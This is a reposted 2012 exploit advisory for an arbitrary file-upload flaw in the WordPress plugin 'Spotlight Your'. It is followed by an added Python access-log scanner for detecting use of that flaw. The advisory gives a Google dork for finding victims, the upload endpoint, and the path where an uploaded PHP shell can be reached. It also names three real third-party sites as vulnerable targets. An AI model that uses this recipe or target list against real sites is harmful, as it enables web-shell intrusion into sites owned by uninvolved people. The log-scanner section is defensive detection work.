INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################
[+] POC Exp.

Target :
- http://domain.com/wp-content/plugins/spotlightyour/

Exploit :
- /monetize/upload/index.php

Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php

Ending :
- Fraksi Bejoug a.k.a Kalam Saheru Saparatoss Blank Blank awkwkwkwk :v

http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/
http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/
http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/
#################################################################################################
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7, penjamoen,
-=[The Crows Crew]=-, Indonesian Hacker
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
########################################[end]####################################################
# 1337day.com [2012-11-19]
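
For site owners checking whether this upload path was used against them, the following is an added example, not part of the original advisory: it scans web-server access logs for POSTs to the plugin's upload endpoint and for PHP files requested from the uploads tree. The two paths come from the advisory; the combined log format, the sample lines and the function name scan are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Both paths are the ones named in the advisory.
UPLOAD_ENDPOINT = "/wp-content/plugins/spotlightyour/monetize/upload/"
UPLOADED_PHP = re.compile(
    r"^/wp-content/uploads/\d{4}/\d{2}/[^/]+\.ph(p\d?|tml)$", re.I)
# Assumed Apache/nginx "combined" format: ip - user [time] "METHOD target proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def scan(lines):
    """Return (findings, correlated_ips) for an iterable of access-log lines.

    findings: (line_no, ip, rule, path, status) tuples.
    correlated_ips: clients that POSTed to the upload endpoint and later
    received a 2xx response for a PHP file under wp-content/uploads.
    """
    findings, posted, correlated = [], set(), set()
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])  # drop query, decode %xx
        if method == "POST" and path.startswith(UPLOAD_ENDPOINT):
            findings.append((n, ip, "upload-endpoint-post", path, status))
            posted.add(ip)
        elif UPLOADED_PHP.match(path):
            # WordPress media uploads should not contain PHP files.
            findings.append((n, ip, "php-in-uploads", path, status))
            if status.startswith("2") and ip in posted:
                correlated.add(ip)
    return findings, sorted(correlated)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [18/Nov/2012:10:01:02 +0700] "GET /wp-content/plugins/spotlightyour/monetize/upload/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Nov/2012:10:01:09 +0700] "POST /wp-content/plugins/spotlightyour/monetize/upload/index.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Nov/2012:10:01:30 +0700] "GET /wp-content/uploads/2012/11/x.php?c=1 HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Nov/2012:10:02:00 +0700] "GET /wp-content/uploads/2012/11/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [18/Nov/2012:10:03:00 +0700] "GET /wp-content/uploads/2012/10/a.PHP HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    hits, ips = scan(SAMPLE)
    for hit in hits:
        print(*hit)
    print("correlated clients:", ips)
```

A correlated client is the strongest signal; a php-in-uploads hit with a 2xx status from any client still warrants inspecting the file on disk.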
Wordpress Plugins Spotlight Your Upload Vulnerability | Juno_okyo's Blog
Leader at J2TEAM. Website: https://j2team.dev/